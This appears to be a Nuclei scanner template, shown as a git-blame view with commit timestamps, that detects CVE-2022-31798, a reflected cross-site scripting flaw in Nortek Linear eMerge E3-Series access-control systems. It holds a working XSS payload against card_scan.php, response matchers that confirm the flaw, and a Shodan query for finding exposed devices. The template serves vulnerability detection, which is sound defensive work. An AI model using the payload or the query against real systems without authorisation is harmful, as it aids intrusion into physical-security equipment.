2022-08-12 11:31:04 +00:00
|
|
|
id: CVE-2022-31798
|
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: Nortek Linear eMerge E3-Series - Cross-Site Scripting
|
2022-08-12 11:31:04 +00:00
|
|
|
author: ritikchaddha
|
2022-09-04 15:21:50 +00:00
|
|
|
severity: medium
|
2022-08-12 11:31:04 +00:00
|
|
|
description: |
|
|
|
|
There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
|
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/167992/
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
|
2022-08-26 08:13:09 +00:00
|
|
|
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
|
2022-08-29 13:55:23 +00:00
|
|
|
classification:
|
2022-09-04 15:21:50 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
2022-08-29 13:55:23 +00:00
|
|
|
cve-id: CVE-2022-31798
|
2022-09-04 15:21:50 +00:00
|
|
|
cwe-id: CWE-79
|
2022-08-12 11:31:04 +00:00
|
|
|
metadata:
|
|
|
|
shodan-query: http.title:"eMerge"
|
2022-08-26 08:13:09 +00:00
|
|
|
verified: "true"
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve2022,emerge,nortek,xss,packetstorm,cve
|
2022-08-12 11:31:04 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-08-13 00:01:54 +00:00
|
|
|
- '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
|
2022-08-12 11:31:04 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-08-13 00:01:54 +00:00
|
|
|
- ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
|
2022-08-12 11:31:04 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|